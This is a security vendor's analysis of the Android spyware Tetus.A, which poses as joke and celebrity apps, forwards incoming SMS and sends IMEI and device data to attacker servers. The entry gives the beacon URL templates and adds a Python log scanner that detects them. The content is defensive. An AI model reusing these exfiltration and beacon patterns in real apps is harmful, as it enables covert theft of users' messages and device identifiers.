Android/Tetus.A!tr.spy
Analysis
Android/Tetus.A!tr.spy is a piece of malware targeting Android mobile phones.
The malicious package comes disguised as legitimate applications such as 'Awesome Jokes', 'Celeb Stalker' etc. The malware silently forwards all incoming SMS messages to the attacker's server and it also tracks installation of other related applications.
Technical Details
The malware comes in packages such as "com.droidmojo.awesomejokes", "com.droidmojo.celebstalker", "com.appengines.fastphone" etc. (ref Fig1, 2 and 3).
Fig1 : Awesome Jokes application icon
Fig2 : Celeb Stalker application icon
Fig3 : Faster Phone application icon
When launched, the application shows a screen corresponding to the application it claims to be.
Once the application page is loaded, the malware registers with a remote website by sending an HTTP request to
[PKG_URL]/ip.php?market=1&lpn=300&pid=[PID]&pm=[Build.MODEL]&vd=[Build.MANUFACTURER]&c=[NETWORK_CARRIER]&imei=[IMEI]&firmware=[FIRMWARE_VERSION]&sdk=[SDK_NUMBER]&sid=[SID]&cc=[NETWORK_OPERATOR_NAME]
where PKG_URL varies with the application, e.g. hxxp://[REMOVED].droidmojo.net, hxxp://[REMOVED]-finity.net, hxxp://[REMOVED]-engines.com.
The server responds with several parameters contained in a JSON object which are used, in particular, to send SMS messages.
Next, an HTTP request is sent out to
"hxxp://[REMOVED]tulus.com/atp-log.php?imei=" + [IMEI] + "&pid=" + [PID] + "&type=message&log=" + [STR]
where
- IMEI = infected phone's IMEI
- PID = obtained from the package resources
- STR = [keyword] ?ucsa=[ucsa]
Then, an SMS is sent to the number [csc] with the content
[keyword] ?ucsa=[ucsa]
where csc, keyword and ucsa are obtained from the JSON response.
Finally, an HTTP request is sent out to
"hxxp://[REMOVED]tulus.com/atp-log.php?imei=" + [IMEI] + "&pid=" + [PID] + "&type=sms&log=" + [STR]
where
- IMEI = infected phone's IMEI
- PID = obtained from the package resources
- STR = "Unknown", "SMS_sent", "Generic_failure", "No_service", "Null_PDU" or "Radio_off", depending on the result of the SMS send attempt
Besides HTTP requests, the malware implements an SMS receiver that forwards the message body of incoming SMS messages to the number [csc].
Whenever a new related application is installed, a request containing the list of related installed applications is sent to the attacker's server at
"hxxp://[REMOVED]tulus.com/atp-log.php?imei=" + [IMEI] + "&pid=" + [PID] + "&type=marketreciever&log=" + [INSTALLED_APPS]
A "related" application is one of the following applications:
- com.droidmojo.awesomejokes
- com.droidmojo.celebstalker
- com.appengines.fastphone
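The check-in and logging requests described above have a fixed shape (ip.php with device parameters, atp-log.php with a type of message, sms or marketreciever), which makes them easy to spot in proxy or web-access logs. The following detector is an added example, not code from the Fortinet write-up; the hostnames and the log lines are constructed placeholders, while the paths, parameter names and type values are taken from the description above.

```python
from urllib.parse import urlsplit, parse_qs

# Values of the "type" parameter sent to atp-log.php, as described in the write-up,
# mapped to the stage of the infection they indicate.
LOG_TYPES = {
    "message": "SMS_request_logged",
    "sms": "SMS_send_result",
    "marketreciever": "related_app_install_report",  # spelled as the malware spells it
}

def classify_beacon(url):
    """Return a dict describing a Tetus.A beacon, or None if the URL does not match."""
    parts = urlsplit(url)
    qs = {k: v[0] for k, v in parse_qs(parts.query).items()}
    script = parts.path.rsplit("/", 1)[-1]
    # Registration: ip.php carrying IMEI plus model (pm) and manufacturer (vd).
    if script == "ip.php" and {"imei", "pid", "pm", "vd"} <= set(qs):
        return {"stage": "registration", "imei": qs["imei"], "pid": qs["pid"], "model": qs["pm"]}
    # Logging: atp-log.php with one of the known type values.
    if script == "atp-log.php" and qs.get("type") in LOG_TYPES and "imei" in qs:
        info = {"stage": LOG_TYPES[qs["type"]], "imei": qs["imei"],
                "pid": qs.get("pid"), "log": qs.get("log", "")}
        if qs["type"] == "sms":
            # The log value is the SMS send result; "SMS_sent" means the premium SMS went out.
            info["send_ok"] = info["log"] == "SMS_sent"
        return info
    return None

def scan_access_log(lines):
    """Return (client_ip, finding) pairs for log lines whose request URL is a beacon."""
    hits = []
    for line in lines:
        fields = line.split()  # constructed format: client_ip timestamp url
        if len(fields) < 3:
            continue
        finding = classify_beacon(fields[2])
        if finding:
            hits.append((fields[0], finding))
    return hits

# Constructed sample log lines; hosts are placeholders standing in for the redacted C2 domains.
SAMPLE_LOG = [
    "10.0.0.5 2012-01-01T10:00:00Z http://c2-a.example.invalid/ip.php?market=1&lpn=300&pid=17&pm=GT-I9100&vd=samsung&c=310260&imei=356938035643809&firmware=2.3.3&sdk=10&sid=1&cc=T-Mobile",
    "10.0.0.5 2012-01-01T10:00:02Z http://c2-b.example.invalid/atp-log.php?imei=356938035643809&pid=17&type=message&log=JOKES+%3Fucsa%3D1234",
    "10.0.0.5 2012-01-01T10:00:05Z http://c2-b.example.invalid/atp-log.php?imei=356938035643809&pid=17&type=sms&log=SMS_sent",
    "10.0.0.9 2012-01-01T10:01:00Z http://www.example.invalid/index.php?pid=17",
]

if __name__ == "__main__":
    for ip, finding in scan_access_log(SAMPLE_LOG):
        print(ip, finding)
```

A hit on the registration stage alone identifies an infected device; a subsequent SMS_send_result with send_ok set confirms that the SMS actually left the phone.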
Permissions required by the application:
- INTERNET
- ACCESS_NETWORK_STATE
- SEND_SMS
- READ_PHONE_STATE
Recommended Action
FortiGate Systems
- Check the main screen using the web interface for your FortiGate unit to ensure that the latest AV/NIDS database has been downloaded and installed on your system - if required, enable the "Allow Push Update" option.
FortiClient Systems
- Quarantine/delete files that are detected and replace infected files with clean backup copies.
Detection Availability
Product | Database
---|---
FortiGate | Extended
FortiClient | Extreme
FortiAPS |
FortiAPU |
FortiMail | Extreme
FortiSandbox | Extreme
FortiWeb | Extreme
Web Application Firewall | Extreme
FortiIsolator | Extreme
FortiDeceptor | Extreme
FortiEDR |